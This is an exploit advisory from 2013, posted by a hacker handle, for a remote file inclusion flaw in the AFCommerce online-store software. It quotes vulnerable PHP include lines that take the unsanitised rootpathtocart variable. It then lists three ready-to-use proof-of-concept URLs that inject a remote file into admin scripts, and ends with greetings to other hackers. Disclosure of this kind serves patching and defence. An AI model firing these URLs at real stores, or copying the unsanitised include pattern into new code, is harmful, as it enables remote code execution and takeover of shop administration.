[o] AFCommerce a.k.a Amazing Flash Commerce <= Remote File Inclusion Vulnerability Software : AFCommerce Professional Edition Version : n/a Vendor : http://www.afcommerce.com/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Desc : AFCommerce is a full and complete online store with both a store front and administration area directly Out-Of-The-Box, which can be easily installed, configured, and maintained over a web-based interface. AFCommerce now includes our Ecommerce Website Building Software integrated with our free shopping cart. This allows you to create an unlimited number of custom web pages, customize font / colors of all your pages, as well as, the structural layout of your website. ============================================================================================================= [o] Vuln adblock.php adminpassword.php controlheader.php include_once ($rootpathtocart . "/admin/customadminfooter.php"); include_once ($rootpathtocart . "/mods/adminfiles/adminpassword.php"); include_once ($rootpathtocart . "/mods/adminfiles/controlheader.php"); ============================================================================================================= [o] Poc http://localhost/afcontrol/adblock.php?rootpathtocart=[RFI] http://localhost/afcontrol/adminpassword.php?rootpathtocart=[RFI] http://localhost/afcontrol/controlheader.php?rootpathtocart=[RFI] ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] December 25 2013 - Papua, Indonesia || Selamat Natal!! Tuhan Yesus Berkati... :)